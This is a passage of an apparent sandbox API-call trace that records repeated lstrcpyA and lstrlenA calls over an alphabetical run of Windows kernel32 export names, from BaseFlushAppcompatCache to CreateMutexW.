lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0078.315] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0078.315] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0078.315] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0078.315] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0078.315] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0078.315] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0078.315] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0078.315] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0078.315] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0078.315] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0078.315] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0078.315] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0078.315] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0078.315] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0078.315] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0078.315] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0078.315] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0078.315] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0078.315] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0078.315] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0078.315] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0078.315] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0078.315] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0078.315] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0078.315] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0078.315] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0078.315] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0078.316] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0078.316] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0078.316] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0078.316] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0078.316] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0078.316] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0078.316] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0078.316] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0078.316] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0078.316] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0078.316] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0078.316] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0078.316] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0078.316] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0078.316] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0078.316] lstrlenA (lpString="BEEP") returned 4 [0078.316] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0078.316] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0078.316] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0078.316] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0078.316] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0078.316] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0078.316] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0078.316] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0078.316] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0078.316] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0078.316] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0078.316] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0078.316] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0078.316] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0078.316] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0078.316] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0078.316] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0078.316] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0078.316] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0078.316] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0078.317] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0078.317] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0078.317] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0078.317] lstrlenA (lpString="CANCELIO") returned 8 [0078.317] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0078.317] lstrlenA (lpString="CANCELIOEX") returned 10 [0078.317] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0078.317] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0078.317] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0078.317] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0078.317] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0078.317] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0078.317] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0078.317] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0078.317] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0078.317] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0078.317] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0078.317] lstrlenA (lpString="CHECKELEVATION") returned 14 [0078.317] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0078.317] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0078.317] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0078.317] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0078.317] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0078.317] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0078.317] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0078.317] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0078.317] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0078.317] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0078.317] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0078.317] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0078.317] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0078.317] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0078.317] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0078.317] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0078.317] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0078.317] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0078.317] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0078.318] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0078.318] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0078.318] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0078.318] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0078.318] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0078.318] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0078.318] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0078.318] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0078.318] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0078.318] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0078.318] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0078.318] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0078.318] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0078.318] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0078.318] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0078.318] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0078.318] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0078.318] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0078.318] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0078.318] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0078.318] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0078.318] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0078.318] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0078.318] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0078.318] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0078.318] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0078.318] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0078.318] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0078.318] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0078.318] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0078.318] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0078.318] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0078.318] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0078.318] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0078.318] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0078.318] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0078.319] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0078.319] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0078.319] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0078.319] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0078.319] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0078.319] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0078.319] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0078.319] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0078.319] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0078.319] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0078.319] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0078.319] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0078.319] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0078.319] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0078.319] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0078.319] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0078.319] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0078.319] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0078.319] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0078.319] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0078.319] lstrlenA (lpString="COPYCONTEXT") returned 11 [0078.319] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0078.319] lstrlenA (lpString="COPYFILEA") returned 9 [0078.319] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0078.319] lstrlenA (lpString="COPYFILEEXA") returned 11 [0078.319] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0078.319] lstrlenA (lpString="COPYFILEEXW") returned 11 [0078.319] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0078.319] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0078.319] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0078.319] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0078.319] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0078.319] lstrlenA (lpString="COPYFILEW") returned 9 [0078.319] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0078.319] lstrlenA (lpString="COPYLZFILE") returned 10 [0078.319] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0078.319] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0078.320] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0078.320] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0078.320] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0078.320] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0078.320] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0078.320] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0078.320] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0078.320] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0078.320] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0078.320] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0078.320] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0078.320] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0078.320] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0078.320] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0078.320] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0078.320] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0078.320] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0078.320] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0078.320] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0078.320] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0078.320] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0078.320] lstrlenA (lpString="CREATEEVENTA") returned 12 [0078.320] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0078.320] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0078.320] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0078.320] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0078.320] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0078.320] lstrlenA (lpString="CREATEEVENTW") returned 12 [0078.320] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0078.320] lstrlenA (lpString="CREATEFIBER") returned 11 [0078.320] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0078.320] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0078.320] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0078.320] lstrlenA (lpString="CREATEFILEA") returned 11 [0078.320] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0078.321] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0078.321] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0078.321] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0078.321] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0078.321] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0078.321] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0078.321] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0078.321] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0078.321] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0078.321] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0078.321] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0078.321] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0078.321] lstrlenA (lpString="CREATEFILEW") returned 11 [0078.321] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0078.321] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0078.321] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0078.321] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0078.321] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0078.321] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0078.321] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0078.321] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0078.321] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0078.321] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0078.321] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0078.321] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0078.321] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0078.321] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0078.321] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0078.321] lstrlenA (lpString="CREATEJOBSET") returned 12 [0078.321] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0078.321] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0078.321] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0078.321] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0078.321] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0078.321] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0078.321] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0078.322] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0078.322] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0078.322] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0078.322] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0078.322] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0078.322] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0078.322] lstrlenA (lpString="CREATEMUTEXW") returned 12 